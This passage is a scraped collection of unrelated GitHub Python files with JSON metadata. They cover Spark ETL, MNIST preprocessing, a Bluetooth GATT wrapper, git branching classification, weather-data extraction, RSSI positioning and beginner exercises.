\"\"\"\n\n aggent_udf = udf(self.get_agent_name, StringType())\n df_tracker = self.get_parquet().filter(\"event_category = 'Property'\")\n df_property = self.connection.read.csv(\n \"test/resources/properties.csv\", header=True\n )\n df_user = self.connection.read.csv(\n \"test/resources/user.csv\", header=True\n )\n\n retval = df_tracker.join(\n df_property, df_tracker.event_label == df_property.id\n ).join(df_user, df_property.submitterId == df_user.id)\n\n retval.select(\n df_property.id.alias('properties_id'),\n df_property.listingType.alias('listing_type'),\n df_property.price.alias('property_price'),\n df_property.localityString.alias('property_locality'),\n df_property.latitude.alias('property_latitude'),\n df_property.longitude.alias('property_longitude'),\n df_property.showOnLanding.alias('property_is_show_on_landing'),\n df_property.featureType.alias('property_is_featured_type'),\n df_property.localityId.alias('property_locality_id'),\n aggent_udf(df_user.firstName,\n df_user.lastName).alias('property_agent_name'),\n df_user.userType.alias('property_agent_type'),\n df_property.marketType.alias('property_market_type'),\n df_tracker.event_sessionID.alias('session_id')\n ).show()\n\n\nif __name__ == '__main__':\n PropertyTracker().main()\n","repo_name":"mochnurhalimizd/etl-data","sub_path":"transform/property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37080758957","text":"\"\"\"\nConvert MNIST data to monomer data\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport random\n\nimport numpy as np\n\nfrom scipy.misc import imresize\n\nfrom ..input_data import SemiMNIST\nfrom ..input_data import dump_array\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output-dir', required=True)\n parser.add_argument('--data-path', default='data/MNIST_data')\n parser.add_argument(\n '--output-shape', type=int, nargs='+', default=(28, 28, 1))\n parser.add_argument('--labeled-percent', type=float, default=0.05)\n parser.add_argument('--all-digits', action='store_true')\n parser.add_argument('--symmetric', action='store_true', help='symmetric')\n parser.add_argument('--resample', action='store_true', help='resample')\n parser.add_argument(\n '--all-random',\n action='store_true',\n help='each base digit only sample'\n 'either negative or positive but not both'\n 'for each sample-rate')\n parser.add_argument('--sample-rate', type=int, default=1)\n parser.add_argument('--seed', type=int, default=633)\n args = parser.parse_args()\n assert len(args.output_shape) == 3\n\n convert(**vars(args))\n\n\ndef convert(output_dir, output_shape, labeled_percent, all_digits, data_path,\n symmetric, resample, all_random, sample_rate, seed):\n data_type = 'diffone' if not all_digits else 'diffone_all'\n data_splits = [\n ('train', SemiMNIST(\n data_type=data_type,\n path=data_path,\n split='train',\n labeled_percent=labeled_percent,\n all_random=all_random,\n sample_rate=sample_rate,\n symmetric=symmetric,\n resample=resample,\n seed=seed)),\n ('val', SemiMNIST(\n data_type=data_type,\n path=data_path,\n split='validation',\n all_random=all_random,\n sample_rate=sample_rate,\n labeled_percent=labeled_percent,\n symmetric=symmetric,\n resample=resample,\n seed=seed)),\n ('test', SemiMNIST(\n data_type=data_type,\n path=data_path,\n split='test',\n all_random=all_random,\n sample_rate=sample_rate,\n symmetric=symmetric,\n resample=resample,\n labeled_percent=1.0,\n seed=seed)),\n ]\n\n start_num = 0\n\n for split, data in data_splits:\n split_path = os.path.join(output_dir, split)\n os.makedirs(split_path, exist_ok=True)\n\n # dump features & categories\n images = data.mnist._images\n labels = data.mnist._labels\n logger.warning('%s: %d images', split, images.shape[0])\n if tuple(output_shape[:2]) != (28, 28):\n images = np.array([\n imresize(image.reshape((28, 28)), output_shape[:2])\n for image in images\n ]).reshape((-1,\n output_shape[0] * output_shape[1])).astype(np.float32)\n images /= 255.\n\n fea_path = os.path.join(split_path, 'features.b')\n meta_path = os.path.join(split_path, 'meta.txt')\n\n with open(fea_path, 'wb') as outfile_fea, open(meta_path,\n 'w') as outfile_meta:\n for i in range(images.shape[0]):\n seq_num = start_num + i\n\n product_id = '{}{:09x}'.format(labels[i], seq_num)\n outfile_fea.write(product_id.encode('ascii'))\n dump_array(outfile_fea, images[i])\n\n digit_type = 'bottom' if labels[i] < 5 else 'top'\n outfile_meta.write(\n '{}\\n digits,{}\\n'.format(product_id, digit_type))\n\n pos_path = os.path.join(split_path, 'pairs_pos.txt')\n neg_path = os.path.join(split_path, 'pairs_neg.txt')\n all_path = os.path.join(split_path, 'pairs_all.txt')\n\n tasks = [\n (pos_path, data.pairs_pos, 1),\n (neg_path, data.pairs_neg, 0),\n ]\n all_pairs = []\n for path, edges, label in tasks:\n with open(path, 'w') as outfile:\n for i in range(edges.shape[0]):\n edge = edges[i]\n label1 = labels[edge[0]]\n label2 = labels[edge[1]]\n id1 = edge[0] + start_num\n id2 = edge[1] + start_num\n outfile.write('{}{:09x} match {}{:09x}\\n'.format(\n label1, id1, label2, id2))\n all_pairs.append((label1, id1, label2, id2, label))\n\n random.seed(seed)\n random.shuffle(all_pairs)\n with open(all_path, 'w') as outfile:\n for label_from, edge_from, label_to, edge_to, label in all_pairs:\n outfile.write('{}{:09x} match {}{:09x} {}\\n'.format(\n label_from, edge_from, label_to, edge_to, label))\n\n start_num += images.shape[0]\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"appier/compatibility-family-learning","sub_path":"cfl/scripts/convert_mnist.py","file_name":"convert_mnist.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"77"} +{"seq_id":"13135161792","text":"from .cbindings import *\nfrom .cbindings import _Gatt, _Option\nfrom .gattchar import GattChar\nfrom . import WarbleException, str_to_bytes, bytes_to_str\nfrom ctypes import cast, POINTER\n\nimport platform\n\nclass Gatt:\n def __init__(self, mac, **kwargs):\n \"\"\"\n Creates a Python Warble Gatt object\n @params:\n mac - Required : mac address of the board to connect to e.g. E8:C9:8F:52:7B:07\n hci - Optional : mac address of the hci device to use, only applicable on Linux\n addr_type - Optional : ble device adress type, defaults to random\n \"\"\"\n \n self.gatt = cast(None, POINTER(_Gatt))\n if (len(kwargs) != 0):\n options = []\n\n options.append(['mac', mac])\n if ('hci' in kwargs and platform.system() == 'Linux'):\n options.append(['hci', kwargs['hci']])\n if ('addr_type' in kwargs):\n options.append(['addr_type', kwargs['addr_type']])\n\n coptions = (_Option * len(options))()\n for i, v in enumerate(options):\n coptions[i] = _Option(key = str_to_bytes(v[0]), value = str_to_bytes(v[1]))\n\n self.gatt = libwarble.warble_gatt_create_with_options(len(options), cast(coptions, POINTER(_Option)))\n else:\n self.gatt = libwarble.warble_gatt_create(str_to_bytes(mac))\n\n self.characteristics = {}\n\n def __del__(self):\n libwarble.warble_gatt_delete(self.gatt)\n self.characteristics = {}\n\n @property\n def is_connected(self):\n return libwarble.warble_gatt_is_connected(self.gatt) != 0\n\n def connect_async(self, handler):\n \"\"\"\n Establishes a connection to the remote device\n @params:\n handler - Required : `(Exception) -> void` function that will be executed when the connect task is completed\n \"\"\"\n def completed(ctx, caller, msg):\n if (msg == None):\n handler(None)\n else:\n handler(WarbleException(bytes_to_str(msg)))\n\n self.connect_handler = FnVoid_VoidP_WarbleGattP_CharP(completed)\n libwarble.warble_gatt_connect_async(self.gatt, None, self.connect_handler)\n\n def disconnect(self):\n \"\"\"\n Closes the connection with the remote device\n \"\"\"\n libwarble.warble_gatt_disconnect(self.gatt)\n\n def on_disconnect(self, handler):\n \"\"\"\n Sets a handler to listen for disconnect events\n @params:\n handler - Required : `(int) -> void` function that will be executed when connection is lost\n \"\"\"\n def event_fired(ctx, caller, status):\n self.characteristics = {}\n handler(status)\n\n self.disconnect_handler = FnVoid_VoidP_WarbleGattP_Int(event_fired)\n libwarble.warble_gatt_on_disconnect(self.gatt, None, self.disconnect_handler)\n\n def find_characteristic(self, uuid):\n \"\"\"\n Find the GATT characteristic corresponding to the uuid value\n @params:\n uuid - Required : 128-bit UUID string to search for\n \"\"\"\n if (uuid not in self.characteristics):\n result = libwarble.warble_gatt_find_characteristic(self.gatt, str_to_bytes(uuid))\n self.characteristics[uuid] = GattChar(self, result) if bool(result) else None\n return self.characteristics[uuid]\n\n def service_exists(self, uuid):\n \"\"\"\n Check if a GATT service with the corresponding UUID exists on the device\n @params:\n uuid - Required : 128-bit UUID string to search for\n \"\"\"\n return libwarble.warble_gatt_has_service(self.gatt, str_to_bytes(uuid)) != 0\n","repo_name":"mbientlab/PyWarble","sub_path":"mbientlab/warble/gatt.py","file_name":"gatt.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"20840978788","text":"import json\nimport os\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\"\"\"\nTrunk based = only 1 branch\nGithub Flow = master and feature branches\nGitFlow = master, develop and feature branches\n\"\"\"\n\n# address_folder = \"E://Json files (Mono)/Productivity\"\n# external_folder = \"E://Json files (Mono)/DB branching\"\n\naddress_folder = \"E://Json files (Multi)/New Database\"\nexternal_folder = \"E://Json files (Multi)/DB branching\"\n\n\ndef define_branch_strategy_gitFlow(branch_list):\n master = False\n dev = False\n if 'master' in branch_list or 'main' in branch_list:\n master = True\n\n for each_branch in branch_list:\n if 'dev' in each_branch:\n dev = True\n break\n\n if dev and master:\n return True\n else:\n return False\n\n\nmono_count = 0\ndouble_count = 0\ntriple_count = 0\ncount = 0\n\ntotal_count = len(os.listdir(address_folder))\n\nerrors = []\n\n''' ********************* Mono Repository ********************************* '''\n# for each_file in os.listdir(address_folder):\n# count += 1\n#\n# print(total_count - count)\n#\n# if '.json' in each_file:\n# with open(address_folder + '/' + each_file, 'r', encoding=\"utf8\") as file:\n# file_content = json.load(file)\n#\n# branch_list = []\n#\n# for each_branch in file_content['branches']:\n# if 'dependabot' not in each_branch['name']:\n# branch_list.append(each_branch['name'])\n#\n# try:\n# if len(branch_list) == 1:\n# mono_count += 1\n# file_content['Branching strategy'] = 'Trunk-Based'\n#\n# elif len(branch_list) >= 2 and define_branch_strategy_gitFlow(branch_list):\n# triple_count += 1\n# file_content['Branching strategy'] = 'GitFlow'\n#\n# elif not define_branch_strategy_gitFlow(branch_list) and len(branch_list) > 1:\n# double_count += 1\n# file_content['Branching strategy'] = 'Github Flow'\n#\n# elif len(branch_list) == 0:\n# file_content['Branching strategy'] = 'None'\n#\n# if file_content['Branching strategy']:\n# json_data = json.dumps(file_content)\n# jsonFile = open(external_folder + '/' + each_file, \"w\")\n# jsonFile.write(json_data)\n# jsonFile.close()\n\n# except Exception as error:\n# print(error)\n# errors.append(each_file)\n#\n#\n# print(errors)\n# print(len(errors))\n\n''' ********************* Multi Repository ********************************* '''\nfor each_file in os.listdir(address_folder):\n count += 1\n\n print(total_count - count)\n\n if '.json' in each_file:\n with open(address_folder + '/' + each_file, 'r', encoding=\"utf8\") as file:\n file_content = json.load(file)\n\n branch_list_front = []\n branch_list_back = []\n\n try:\n for each_branch in file_content['Front Repositories']['branches']:\n if 'dependabot' not in each_branch['name']:\n branch_list_front.append(each_branch['name'])\n\n if len(branch_list_front) == 1:\n mono_count += 1\n file_content['Front Repositories']['Branching strategy'] = 'Trunk-Based'\n\n elif len(branch_list_front) >= 2 and define_branch_strategy_gitFlow(branch_list_front):\n triple_count += 1\n file_content['Front Repositories']['Branching strategy'] = 'GitFlow'\n\n elif not define_branch_strategy_gitFlow(branch_list_front) and len(branch_list_front) > 1:\n double_count += 1\n file_content['Front Repositories']['Branching strategy'] = 'Github Flow'\n\n elif len(branch_list_front) == 0:\n file_content['Front Repositories']['Branching strategy'] = 'None'\n\n # *******************************************************************************************\n\n for each_branch in file_content['Back Repositories']['branches']:\n if 'dependabot' not in each_branch['name']:\n branch_list_back.append(each_branch['name'])\n\n if len(branch_list_back) == 1:\n mono_count += 1\n file_content['Back Repositories']['Branching strategy'] = 'Trunk-Based'\n\n elif len(branch_list_back) >= 2 and define_branch_strategy_gitFlow(branch_list_back):\n triple_count += 1\n file_content['Back Repositories']['Branching strategy'] = 'GitFlow'\n\n elif not define_branch_strategy_gitFlow(branch_list_back) and len(branch_list_back) > 1:\n double_count += 1\n file_content['Back Repositories']['Branching strategy'] = 'Github Flow'\n\n elif len(branch_list_back) == 0:\n file_content['Back Repositories']['Branching strategy'] = 'None'\n\n json_data = json.dumps(file_content)\n jsonFile = open(external_folder + '/' + each_file, \"w\")\n jsonFile.write(json_data)\n jsonFile.close()\n\n except Exception as error:\n print(error)\n print(each_file)\n continue\n\n","repo_name":"Shakikhanli/Statistics","sub_path":"Define Branching stratgey.py","file_name":"Define Branching stratgey.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4974282836","text":"import math\na = [-100,5,2,3,4,9,10,5,6,7,8,100]\nn = len(a)\nl = []\nt = []\nstartOf = []\nfor i in range(n):\n t.append(0)\n l.append(0)\n startOf.append(0)\nstartOf[1] = n-1\nm = 1\n\ndef findInSO(i, a, startOf, m):\n inf = 1\n sup = m+1\n while(inf + 1 < sup):\n median = math.floor((inf + sup)/2)\n j = startOf[median]\n if a[j] > a[i]:\n inf = median\n else:\n sup = median\n return startOf[inf]\n\ndef optimize(a, l, t, n, m, startOf):\n l[n-1] = 1\n for i in range(n-2,-1,-1):\n j = findInSO(i, a, startOf, m)\n k = l[j]+1\n if(k > m):\n m = k\n startOf[k] = i\n else:\n if a[i] > a[startOf[k]]:\n startOf[k] = i\n l[i]=k\n t[i]=j\n\n\n\noptimize(a,l,t,n,m, startOf)\nprint(\"a\", a)\nprint(\"l\", l)\nprint(\"t\", t)\nprint(\"startOf\", startOf)\nresult = []\nseqLen = l[0]\nresult.append(a[0])\nfor i in range(1,n):\n if(l[i] == seqLen - 1):\n result.append(a[i])\n seqLen = seqLen - 1\nprint(\"result\", result)\n","repo_name":"hongvo2308/learning","sub_path":"Algorithms/dynamic_planning/longest_sub_sequence0.py","file_name":"longest_sub_sequence0.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21494312585","text":"import timewinder\nimport pytest\n\nfrom timewinder.generators import Set\nfrom timewinder.evaluation import ConstraintError\nfrom timewinder.evaluation import StutterConstraintError\n\n\n@timewinder.object\nclass Account:\n def __init__(self, name, amt):\n self.name = name\n self.acc = amt\n\n\ndef test_overdraft_1():\n alice = Account(\"alice\", 5)\n bob = Account(\"bob\", 5)\n\n @timewinder.process\n def withdraw(sender, reciever, amount):\n sender.acc = sender.acc - amount\n yield \"deposit\"\n reciever.acc = reciever.acc + amount\n\n no_overdrafts = timewinder.ForAll(Account, lambda a: a.acc >= 0)\n\n ev = timewinder.Evaluator(\n objects=[alice, bob],\n threads=[withdraw(alice, bob, 3)],\n specs=[no_overdrafts],\n )\n ev.evaluate()\n ev._print_state_space()\n assert ev.stats.states == 3\n\n\ndef test_overdraft_initial_conditions():\n alice = Account(\"alice\", 5)\n bob = Account(\"bob\", 5)\n\n @timewinder.process\n def withdraw(sender, reciever, amount):\n sender.acc = sender.acc - amount\n yield \"deposit\"\n reciever.acc = reciever.acc + amount\n\n no_overdrafts = timewinder.ForAll(Account, lambda a: a.acc >= 0)\n\n ev = timewinder.Evaluator(\n objects=[alice, bob],\n threads=[withdraw(alice, bob, Set(range(1, 7)))],\n specs=[no_overdrafts],\n )\n\n got_error = False\n try:\n ev.evaluate()\n except ConstraintError as e:\n got_error = True\n print(e.name)\n print(e.thunk)\n\n assert got_error\n assert ev.stats.states == 12\n\n\n@pytest.mark.benchmark(group=\"practical_tla_1\")\ndef test_check_and_withdraw_reinterp(benchmark):\n @timewinder.process\n def check_and_withdraw(sender, reciever, amt):\n if amt <= sender.acc:\n sender.acc = sender.acc - amt\n yield \"deposit\"\n reciever.acc = reciever.acc + amt\n\n no_overdrafts = timewinder.ForAll(Account, lambda a: a.acc >= 0)\n\n def reset_and_eval():\n alice = Account(\"alice\", 5)\n bob = Account(\"bob\", 5)\n\n ev = timewinder.Evaluator(\n objects=[alice, bob],\n threads=[\n check_and_withdraw(alice, bob, Set(range(1, 6))),\n check_and_withdraw(alice, bob, Set(range(1, 6))),\n ],\n specs=[no_overdrafts],\n )\n ev.evaluate(steps=10)\n return ev.stats\n\n stats = benchmark(reset_and_eval)\n\n assert stats.states == 225\n\n\ndef test_liveness_reinterp():\n @timewinder.process\n def check_and_withdraw(sender, reciever, amt):\n if amt <= sender.acc:\n sender.acc = sender.acc - amt\n yield \"deposit\"\n reciever.acc = reciever.acc + amt\n\n no_overdrafts = timewinder.ForAll(Account, lambda a: a.acc >= 0)\n\n @timewinder.predicate\n def consistent_total(a, b):\n total = a.acc + b.acc\n return total == 10\n\n alice = Account(\"alice\", 5)\n bob = Account(\"bob\", 5)\n\n eventually_consistent = timewinder.Eventually(\n timewinder.Always(consistent_total(alice, bob))\n )\n\n ev = timewinder.Evaluator(\n objects=[alice, bob],\n threads=[\n check_and_withdraw(alice, bob, Set(range(1, 6))),\n check_and_withdraw(alice, bob, Set(range(1, 6))),\n ],\n specs=[\n no_overdrafts,\n eventually_consistent,\n ],\n )\n\n got_error = False\n try:\n ev.evaluate(steps=10)\n except StutterConstraintError as s:\n got_error = True\n print(\"\\n\" + s.name + \"\\n\")\n ev.replay_thunk(s.thunk)\n\n assert got_error\n","repo_name":"timewinder-dev/timewinder-prototype","sub_path":"tests/reinterp/test_practical_tla_chap_1_reinterp.py","file_name":"test_practical_tla_chap_1_reinterp.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"16696815901","text":"velocity = float(input(\"Enter the velocity of the particle: \"))\ntarget_height = float(input(\"Enter the height of the particle of which you want to find the time of (in meters): \"))\n\n\nv = velocity\ng = 9.8 # makes sure the code only applies to problems on Earth\nh = 0\nt = 0\n\ndef height(v0, h0, t):\n inc = 0.0005\n v, h = v0, h0\n for i in range(int(t / inc)):\n v -= g * inc\n h += v * inc\n return h\n\n\ndef average(a, b):\n return (a + b) / 2\n\n\ndef bin_search(f, lower, upper, target):\n for i in range(40):\n avg = average(lower, upper)\n guess = f(29, 0, avg)\n if guess == target:\n return avg\n if guess < target:\n upper = avg\n else:\n lower = avg\n return avg\n\n\nprint( \"It takes \"+ str(bin_search(height, 0, 10000, target_height)) + \" seconds for the particle to reach \" + str(target_height) + \" meters\" )\n","repo_name":"ThilakBS/Math-Code","sub_path":"Calc-Finding T given H.py","file_name":"Calc-Finding T given H.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43709847007","text":"# Write a Python function that takes two lists \r\n#and returns True if they have at least one common member\r\n\r\n# lst1 = [1,2,3,4,5]\r\n# lst2 = [5,6,7,8,9]\r\n# for i in lst1:\r\n# for j in lst2:\r\n# if i == j:\r\n# res = True\r\n# break\r\n# else:\r\n# res = False\r\n# print(res)\r\n\r\n# lst1 = [1,2,3,4,5]\r\n# lst2 = [6,7,8,9]\r\n\r\n# for i in lst1:\r\n# for j in lst2:\r\n# if i == j:\r\n# res = True\r\n# break\r\n# else:\r\n# res = False\r\n# print(res)\r\n\r\ndef common_data(list1, list2):\r\n result = False\r\n for x in list1:\r\n for y in list2:\r\n if x == y:\r\n result = True\r\n return result\r\nprint(common_data([1,2,3,4,5], [5,6,7,8,9]))\r\nprint(common_data([1,2,3,4,5], [6,7,8,9]))\r\n","repo_name":"mumbikernikhil/Python-Imp-Codes","sub_path":"Python Programs/List/18. chk common elements.py","file_name":"18. chk common elements.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7267074747","text":"from math import sqrt\nimport pandas as pd \nimport sympy\nimport numpy as np \nimport itertools\n\nRSSI_threshold = 90\n\n\ndef distance_to_BS(rssi, a=54, n=4):\n \"\"\"\n 根据RSSI计算距离\n :param rssi:\n :param a: 距离发射器1m时的RSSI值,单位:-dbm,默认为42\n :param n: 衰减系数,默认为3.3\n :return:\n \"\"\"\n return 10 ** ((abs(rssi) - a) / (10 * n)) if abs(rssi) < RSSI_threshold else None\n\n\ndef locate_by_pointlist(point_list: list): #两点定位\n \"\"\"\n 根据已知节点坐标和各自到未知节点的距离估计未知节点的位置\n :param point_list: [x, y ,distance]\n :return: 未知节点的坐标\n \"\"\"\n x = 0\n y = 0\n temp_list = point_list.copy()\n for p in temp_list:\n if p[2] is None:\n point_list.remove(p)\n num = len(point_list)\n temp_list = point_list.copy()\n if num == 2:\n for p1 in point_list:\n temp_list.remove(p1)\n for p2 in temp_list:\n p2p = distance(p1, p2)\n dist_sum = p1[2] + p2[2]\n if dist_sum <= p2p:\n x += p1[0] + (p2[0] - p1[0])*p1[2] / dist_sum\n y += p1[1] + (p2[1] - p1[1])*p1[2] / dist_sum\n else:\n dr = p2p / 2 + (p1[2]**2 - p2[2]**2) / (2 * p2p)\n x += p1[0] + (p2[0] - p1[0])*dr / p2p\n y += p1[1] + (p2[1] - p1[1])*dr / p2p\n #x /= num\n #y /= num\n elif num >=3:\n x, y = three_point(point_list)\n elif num == 1:\n x = point_list[0][0]\n y = point_list[0][1]\n # x /= (num*(num-1))/2\n # x /= (num*(num-1))/2\n return x, y\n\n\ndef distance(p1, p2):\n return sqrt((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)\n\ndef three_point(point_list: list): #三点定位\n temp_list = point_list.copy()\n for p in temp_list:\n if p[2] is None:\n point_list.remove(p)\n\n sumX=0.0\n sumY=0.0\n\n min=temp_list[0][2]\n min_p=temp_list[0]\n for p in temp_list:\n if(p[2] 1 else JST1\n\nJST2 = JST1 + timedelta(days=COM.GFS_DAYS)\nJST2 = datetime.strptime(sys.argv[2][:8],\"%Y%m%d\") + timedelta(days=1) if len(sys.argv) > 2 else JST2\n\nSTEP = 1\nSTEP = int(sys.argv[3]) if len(sys.argv) > 3 else STEP\n\n## 動作モードにより出力先をスイッチ\n#OUT_PATH = \"./forecast\" if FORECAST else \"./hindcast\"\nOUT_PATH = COM.FCST_PATH if FORECAST else COM.HCST_PATH\nos.makedirs(OUT_PATH, exist_ok=True)\n\n\n###########################################\n## GFSファイルの列挙\nDAYS = (JST2-JST1).days\nCSV_TIME = COM.CSV_TIME\nCSV_ZONE = COM.CSV_ZONE\nGFS_INIT = COM.GFS_INIT\nGFS_DAYS = COM.GFS_DAYS\nGFS_TIME = 'UTC'\n\n## JST1を含む直近のUTC1\nUTC1 = JST1 + timedelta(hours=GFS_INIT)\nUTC2 = JST2 + timedelta(hours=GFS_INIT)\nwhile UTC1 + timedelta(hours=9) > JST1:\n UTC1 -= timedelta(days=1)\n UTC2 -= timedelta(days=1)\n\nGFS_PATH = []\nGFS_ROOT = COM.DATA_PATH\nfor d in range(0,DAYS,STEP):\n UTC = UTC1 + timedelta(days=d)\n GFS = GFS_ROOT +\"/\"+ \"gfs_%s%02d_%03d.nc\"%(UTC.strftime(\"%Y%m%d\"),GFS_INIT,24*GFS_DAYS)\n if os.path.exists(GFS): GFS_PATH += [GFS]\n\n##\nprint(\"utc1:\", UTC1)\nprint(\"utc2:\", UTC2)\nprint(\"gfs:\", GFS_PATH)\nprint(\"out:\", OUT_PATH)\n#sys.exit(0)\n\n###########################################\ndef lat_lon_to_y_x(lat,lon,lat_,lon_):\n y = np.argmin(np.abs(lat-lat_))\n x = np.argmin(np.abs(lon-lon_))\n return y,x\n\n###########################################\n## 抽出地点と気象変数の指定\nENCODE = \"cp932\"\nSDP_LIST = pd.read_csv(COM.INFO_PATH +\"/\"+ \"sdp_list.csv\", index_col=\"SDP\",encoding=ENCODE)\nGFS_LIST = pd.read_csv(COM.INFO_PATH +\"/\"+ \"gfs_list.csv\", index_col=\"GFS\",encoding=ENCODE)\nVAR_LIST = GFS_LIST[(GFS_LIST.LAYERS>=1)&(GFS_LIST.LAYERS<10)].index.tolist()\n\"\"\"\n# デバッグ用: 地点と変数を制限\nSDP_LIST = SDP_LIST[:4]\nVAR_LIST = ['Temperature_surface']\n\"\"\"\n\n## GFS抽出データの格納先\nGFS_DATA = {}\nfor SDP in SDP_LIST.index: GFS_DATA[SDP] = []\n\nfor GFS in GFS_PATH:\n ###########################################\n ## GFSファイルの参照開始\n data = netCDF4.Dataset(GFS, 'r')\n ## 緯度、経度から配列添字へ\n LAT_ = np.array(data[\"lat\"][:].squeeze())\n LON_ = np.array(data[\"lon\"][:].squeeze())\n ###########################################\n # 抽出地点のループ\n for SDP in SDP_LIST.index[:]:\n NAME = SDP_LIST.loc[SDP,\"NAME\"]\n LAT = SDP_LIST.loc[SDP,\"lat\"]\n LON = SDP_LIST.loc[SDP,\"lon\"]\n y,x = lat_lon_to_y_x(LAT,LON,LAT_,LON_)\n print(sys.argv[0], \"%05d %d %d %.3f %.3f %s\"%(SDP,y,x,LAT,LON,NAME))\n\n ###########################################\n # CSV用データフレームの作成\n time_var = data.variables['time']\n time_vals = num2date(time_var[:].squeeze(), time_var.units)\n\n reftime_var = data.variables['reftime']\n reftime_vals = num2date(reftime_var[:].squeeze(), reftime_var.units)\n\n START = time_vals[0].strftime(\"%Y%m%d %H:%M\")\n END = time_vals[-1].strftime(\"%Y%m%d %H:%M\")\n FREQ = \"%dH\" % int((time_vals[1] - time_vals[0]).seconds/3600)\n\n INDEX = pd.date_range(START, END, freq=FREQ)\n DATAF = pd.DataFrame(index=INDEX)\n DATAF.index = DATAF.index\n DATAF.index.name = GFS_TIME\n\n DATAF[\"reftime\"] = reftime_vals\n\n ## 気象変数のループ\n for NAME in VAR_LIST:\n data_vals = data.variables[NAME][:].squeeze()\n SHAPE = data_vals.shape\n DIM = len(SHAPE)\n NZ = 1 if DIM==3 else SHAPE[1]\n NT = len(INDEX)\n ## 高さ方向のループ\n for z in range(0,NZ):\n c = \"%s_%02d\"%(NAME,z)\n if SHAPE[0]!=NT:\n print(sys.argv[0], \"skip\",NAME)\n DATAF[c] = np.nan\n elif DIM==3:\n DATAF[c] = data_vals[:,y,x]\n elif DIM==4:\n DATAF[c] = data_vals[:,z,y,x]\n\n ###########################################\n ## CSVファイルの保存\n GFS_DATA[SDP] += [DATAF]\n\n ###########################################\n ## GFSファイルの参照終了\n data.close()\n\n###########################################\nPERCENTILES = np.linspace(0.01,0.99,99)\nMEAN_3H = []\nMEAN_1D = []\nfor SDP in SDP_LIST.index:\n print(sys.argv[0], SDP,\"concat and save ...\")\n ## データフレームを結合\n DATA = pd.concat(GFS_DATA[SDP])\n ## 時刻の重複を除去\n DATA[GFS_TIME] = DATA.index\n DATA = DATA.drop_duplicates(subset=GFS_TIME,keep='last')\n DATA = DATA.drop(columns=GFS_TIME)\n ## 指定期間のデータフレームへ\n TEMP = pd.DataFrame(index=pd.date_range(UTC1,UTC2,freq=FREQ))\n DATA = TEMP.join(DATA)\n DATA.index.name = CSV_TIME\n DATA.index = DATA.index + timedelta(hours=CSV_ZONE)\n ## 統計値の計算\n STAT = DATA.describe(percentiles=PERCENTILES)\n MEAN_3H += [DATA.resample(\"3H\").mean()]\n MEAN_1D += [DATA.resample(\"1D\").mean()]\n ## ファイルの保存\n if FORECAST:\n DATA.to_csv(OUT_PATH +\"/\"+ \"%05d.csv\"%SDP)\n else:\n DATA.to_csv(OUT_PATH +\"/\"+ \"%05d.csv\"%SDP)\n #STAT.to_csv(OUT_PATH +\"/\"+ \"%05d_stat.csv\"%SDP)\n\n###########################################\nGFS_MEAN3H = pd.concat(MEAN_3H).describe(percentiles=PERCENTILES)\nGFS_MEAN1D = pd.concat(MEAN_1D).describe(percentiles=PERCENTILES)\nGFS_MEAN3H.to_csv(OUT_PATH +\"/\"+ \"gfs_mean3h.csv\")\nGFS_MEAN1D.to_csv(OUT_PATH +\"/\"+ \"gfs_mean1d.csv\")\n\n##################################################\nprint(\"leave:\", sys.argv)\nsys.exit(0)\n\n","repo_name":"hshin-git/gfs_rank","sub_path":"2_gfs_to_stat.py","file_name":"2_gfs_to_stat.py","file_ext":"py","file_size_in_byte":6049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4961949185","text":"\"\"\"\n# author Liu shi hao\n# date: 2019/11/18 18:55\n# file_name: task\n\n\"\"\"\n\n\n# 1、定义一个Person类,它包含数据成员age, name和gender。\n# 从Person中派生一个类Employee,在新类中添加一个数据成员,存储个人的number.\n# 再从Employee中派生一个类Executive,每个派生类都应该定义一个方法,来显示相关的信息(名称和类型,如”Fred Smith is an Employee”)。\n# 编写一个列表,包含3个Executive对象,2个一般的Employee对象,然后显示它们的信息。\n#\nclass Person:\n\n def __init__(self, age, name, gender) -> None:\n super().__init__()\n self.age = age\n self.name = name\n self.gender = gender\n\n\nclass Employee(Person):\n\n def __init__(self, age, name, gender, number) -> None:\n super().__init__(age, name, gender)\n self.number = number\n\n def show(self):\n print(f\"{self.name} is an Employee\")\n\n\nclass Executive(Employee):\n\n def show(self):\n print(f\"{self.name} is an Executive\")\n\n\nlist1 = [Executive(53, \"李四\", \"男\", \"001\"),\n Executive(43, \"王五\", \"男\", \"011\"),\n Executive(23, \"赵月\", \"女\", \"006\"),\n Employee(25, \"张三\", \"男\", \"001\"),\n Employee(29, \"陈东\", \"男\", \"211\")]\n\n\ndef show_all():\n for i in range(len(list1)):\n list1[i].show()\n\n\n# show_all()\n# 2、设计一个图书管理系统,基类为类Book,要求有书名和作者属性,\n# 由Book类派生子类AudioBook(有声书,需要具有演说者属性),\n# 对于Book和AudioBook进行合理的属性及行为的抽象,\n# 同时实现该类的控制台打印方法\n#\nclass Book:\n\n def __init__(self, title, author) -> None:\n super().__init__()\n self.title = title\n self.author = author\n\n @property\n def title(self):\n return title\n\n @property\n 